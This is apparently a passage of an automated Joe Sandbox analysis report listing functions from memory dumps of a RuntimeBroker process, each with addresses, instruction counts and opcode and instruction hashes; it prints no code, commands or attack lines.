                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: cc8826f5d92ee687ceaccdb623a758b592c177df003bdb149565f82e7f406cd8
                                                                      • Instruction ID: c92f5a6b4f57bf4b923ad0620c610ca75563f31ed948fb5cf24ba7a2abe9c107
                                                                      • Opcode Fuzzy Hash: cc8826f5d92ee687ceaccdb623a758b592c177df003bdb149565f82e7f406cd8
                                                                      • Instruction Fuzzy Hash: DD214CB2A199598FE798EB68C856AF8B3E1FFA9341F4085F5D04DC3192CD346D858B80
                                                                      Function 00007FFAAB48DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: c9d974e27934447977b2f7525640126fe863441ce8873503cd8c85f766359c83
                                                                      • Instruction ID: 524bd60320f761e896e3024d880a22a527e314ae60f98fd06e75f71417300351
                                                                      • Opcode Fuzzy Hash: c9d974e27934447977b2f7525640126fe863441ce8873503cd8c85f766359c83
                                                                      • Instruction Fuzzy Hash: 0101F732F0981A8BEB54E7A8D4457FD73E2EF94351F00857AD21DD3180DE38A9948BC0
                                                                      Function 00007FFAAB4837C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction ID: ef584b4bd0f9a2371cb140f86be975e99477a4d177fc4e8d67ba3617aadb8806
                                                                      • Opcode Fuzzy Hash: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction Fuzzy Hash: E5F0E56150E7C04FD71A9A3888698517F60EF2720134A41EFC045CF1E3DA1DCC88C752
                                                                      Function 00007FFAAB48AC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction ID: e0799a57bffe279d3bb1c8d2dba211982506b9a8211fa688546437b309e05282
                                                                      • Opcode Fuzzy Hash: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction Fuzzy Hash: 40E0657150A7C48FD719A67888698657FA0EF6720174951EEC045CF1A3EA1D8885C751
                                                                      Function 00007FFAAB48AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction ID: 7d3e241e690c04e08218fcb51fda55da4c8b1307b9aef79e5ec1253b9e08a7d1
                                                                      • Opcode Fuzzy Hash: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction Fuzzy Hash: 0DF0E57090E3C48FC71ADB348829414BFA0EF6720134A45EFC045CF1A3EA2D8888CB01
                                                                      Function 00007FFAAB482539 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction ID: 9bbabbd86bf3a29aa04a346187c22bf329de78387174c6b7f3a577c7176c81db
                                                                      • Opcode Fuzzy Hash: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction Fuzzy Hash: E5F0E571A0A3C04FCB15DB3884A44547F60EF6720074941EEC045CF1E7DA2CD84AC700
                                                                      Function 00007FFAAB48B229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction ID: bf0dc71b756ad3866bde4f70ed551769ffe9311e09ac155b67902bfb345e3eff
                                                                      • Opcode Fuzzy Hash: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction Fuzzy Hash: 6DE0926144A3C04FC705AB7888658543FA0DE2B21178A40DEC045CF0B3D21E8849C712
                                                                      Function 00007FFAAB4825C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction ID: ee824d2981d9c9ff3989126930468c8127fb7e9e7630e69a31de1b07a6ef572b
                                                                      • Opcode Fuzzy Hash: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction Fuzzy Hash: 1DE01A7144F7C04FCB4AEB7488698547FA1AE6721178A41EEC049CF1B3E62E8849C701
                                                                      Function 00007FFAAB4889A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction ID: 3529e2c3aa8f7f7a5f0cfd465985b311be178d32710ee6d3fc3b8c3a534c07cd
                                                                      • Opcode Fuzzy Hash: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction Fuzzy Hash: ABE01A7144F7C08FCB4AEB74886A8547FB1AE6721078A40EEC089CF1B3E62E8849C701
                                                                      Function 00007FFAAB4508D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction ID: b870b6bc90a23b9add67cbd2ca7872be046cab6a3111a16cd423a2fb10a2e75b
                                                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction Fuzzy Hash: 0A412F3264CA648FD714FBACE4889F97BE0EF8632170549BBD08ACB063D910AC8183C1
                                                                      Function 00007FFAAB45090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 617b499b883f529f54e22c9200771b0445154e1a1e95bd444f6b999d69d5ca48
                                                                      • Instruction ID: ec7da4f02fffaa736ace9113d8f6779e155bb1694b6589b44300ec01165b939f
                                                                      • Opcode Fuzzy Hash: 617b499b883f529f54e22c9200771b0445154e1a1e95bd444f6b999d69d5ca48
                                                                      • Instruction Fuzzy Hash: A3411553A4EA956FE314B37CE05A9F97BD0DF86261B0449FED08EC61A3CD086C818281
                                                                      Function 00007FFAAB450908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: faf4efb2ab944e200b9afe7d364de4d2c9b83e7877de95e667fe599b5e5e9f02
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: F121D53130DC184FE768EB0CE889DB973D1EB5A32170101BAE58EC7136E911EC8287C1
                                                                      Function 00007FFAAB450960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78d52892717b68b6bf122640078272ceb39eeada8ee8d97e3f2adc356c698ad7
                                                                      • Instruction ID: c903e8089866006692a792132653ee25d7ba5419cb6d1bcb635458fadfd86ca3
                                                                      • Opcode Fuzzy Hash: 78d52892717b68b6bf122640078272ceb39eeada8ee8d97e3f2adc356c698ad7
                                                                      • Instruction Fuzzy Hash: E9312452A4EE566FE258F37CE44A9B977D1DF863A1B0445FED00EC32E3CC086C824280
                                                                      Function 00007FFAAB45116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6f9336f05fac5a3badc53f65dba6c84cf2777f57b5db6ff75ecb9e164af3c61
                                                                      • Instruction ID: 1c6fb7179e8b628cf34a8d07d423ed4f29663ea84bb7b07bf76606bfdcd5446c
                                                                      • Opcode Fuzzy Hash: e6f9336f05fac5a3badc53f65dba6c84cf2777f57b5db6ff75ecb9e164af3c61
                                                                      • Instruction Fuzzy Hash: A531E67190DA4ACFEF45EB68C8559B97BF0FF5A300B0446FED00EC71A2DA29A844C781
                                                                      Function 00007FFAAB450998 Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85d3475cf8a8d4379020301dfefd72f42515015869424a29a291333b6daf5266
                                                                      • Instruction ID: c1df36a90fad6ccd13e8be360523a79e79a90bdbe321e110090fdf0e5cc3f4d7
                                                                      • Opcode Fuzzy Hash: 85d3475cf8a8d4379020301dfefd72f42515015869424a29a291333b6daf5266
                                                                      • Instruction Fuzzy Hash: E0312861A0EE595FE348E73C805AA79BBD2EF99390F1441BDD40EC32E3CC14AC418290
                                                                      Function 00007FFAAB450C25 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff27b7bd636aa227821d2e9c2e7a84277ca1e95adede5e376d84388c47d29dea
                                                                      • Instruction ID: ff603c7645c7d67638bc60768cfef82baf93145f1d3e68f2a8cdfc0d57b77e51
                                                                      • Opcode Fuzzy Hash: ff27b7bd636aa227821d2e9c2e7a84277ca1e95adede5e376d84388c47d29dea
                                                                      • Instruction Fuzzy Hash: FD31EA7AA0DA49DBE716E768D8451EC7FA0EF83351F1586BBD00CCA2D3D938294987C1
                                                                      Function 00007FFAAB482601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e2e9bef00f67dbaf7d3b30c82acdd488e57bf194e7e1c8496884a79250aec08
                                                                      • Instruction ID: be81900eeeebc575bc84a61c58f85c1d77d3be09eb19a56a3577e3c560b1bdc4
                                                                      • Opcode Fuzzy Hash: 5e2e9bef00f67dbaf7d3b30c82acdd488e57bf194e7e1c8496884a79250aec08
                                                                      • Instruction Fuzzy Hash: 6521CF51A1EB8A8FF784E7BD84666B576D1FF66344F4441BAD41DC31E3CC5818894382
                                                                      Function 00007FFAAB4569E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 92862ea46eb3bcbf4a47db08aa497958318df00d169b097e13c4ba846a83e063
                                                                      • Instruction ID: d95b5ed70d1ce5d37b7fc5aa8691b21a815dda1983ffc085ac4597ff3cc4bd8a
                                                                      • Opcode Fuzzy Hash: 92862ea46eb3bcbf4a47db08aa497958318df00d169b097e13c4ba846a83e063
                                                                      • Instruction Fuzzy Hash: 34211D30D19959CFEB65DB04C454BA9B3E1FB59314F1086EEC40EE32A5CA75AE84CB80
                                                                      Function 00007FFAAB450C38 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction ID: 2a59ae26bc7427f3c6d6ad4ad74413e2cd6fc66694184ddd4d7280093efb0704
                                                                      • Opcode Fuzzy Hash: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction Fuzzy Hash: 0C11A339A0DB49DFE716DB68C85119C7FB0EF43391F1586BBC048DB2A2D5341A4A87C1
                                                                      Function 00007FFAAB450C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction ID: 2e0e37c187032897803a567ac2cce49fc3280105f8fe4737f82a21c29a15210f
                                                                      • Opcode Fuzzy Hash: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction Fuzzy Hash: 1601E139A0EB88DFE706DB68C85019C7FB0EF43390F0586BBC048CB2A2D5341A4987C0
                                                                      Function 00007FFAAB450C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad47b41a61c876ed5843851a67f6bea352b9b274289ef60d1b7dbd82702c2550
                                                                      • Instruction ID: 245d358c4ae833b5e972c8c127fe51b1ab168c75cfa2f8e9d6807107dfa70008
                                                                      • Opcode Fuzzy Hash: ad47b41a61c876ed5843851a67f6bea352b9b274289ef60d1b7dbd82702c2550
                                                                      • Instruction Fuzzy Hash: 2101807990E789DFE706DB68C8401987FB0EF43350F1586EBD048DB2A2D5345A49C781
                                                                      Function 00007FFAAB464D25 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: 13c9970afd01a3a4a2aabd017b5f6e121227ccebce8e1dfd1295fdaea83d703a
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: 4BF03020A0990BCFFE55EB18E4706B9B291FF96791F118175D40DC22A6FE28E94986C4
                                                                      Function 00007FFAAB488119 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8eb9c83c84a3d41267e027f1a2a356b5569287197fb2706119a0fc7b4b4c6d7f
                                                                      • Instruction ID: d266baf5a57b6a3ed3de71f1ddd53178e10ef48e373e75905bec8b51d8418278
                                                                      • Opcode Fuzzy Hash: 8eb9c83c84a3d41267e027f1a2a356b5569287197fb2706119a0fc7b4b4c6d7f
                                                                      • Instruction Fuzzy Hash: BDE04F6294F7C08FC70B977488A98A07F60DE6721174A41EAC045CF6B3DA1A8C4AC752
                                                                      Function 00007FFAAB48AC70 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB48AD40 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB469FB0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 3ecbe9938d3d5282e53470bfc218a27b9085fd1d0e84d152b3cdd83e74fdeb41
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: BBE04F31E4A50B9BF715A704D8646F8B201AB633A0F04C3B5C44C972E6EE6CA948C6C1
                                                                      Function 00007FFAAB464597 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6d22991d17aec44ac31572768d43e4d3ed65cbab8ed919a3751969a4ddee21c7
                                                                      • Instruction ID: de138eacbc4b7a82dec5fd8bbfc942f868482a1d091858e87367c3229cdb97f4
                                                                      • Opcode Fuzzy Hash: 6d22991d17aec44ac31572768d43e4d3ed65cbab8ed919a3751969a4ddee21c7
                                                                      • Instruction Fuzzy Hash: 60E08CB1E2991ACBFB549B98E825ABDABB1FB45280FA00136D009C3295DE2428024B90
                                                                      Function 00007FFAAB4825E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB487700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: a6d874495ca1b1927795eef0dc549d33877a6ae3422cc401175fdfe997974fc4
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: CFD01234B619044F870CA77C885987477D1EB6A616B9540A9D00AC72B1DD6ADC99C781
                                                                      Function 00007FFAAB450B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: f1f10a7582211f653d9c310832131a2cecc0f1f7495a3073e77afd64dcd0bfdd
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: EAD012345668098FC650EB38D9954A4BA90FB0A214F8901D4E40CC7161D3569894C741
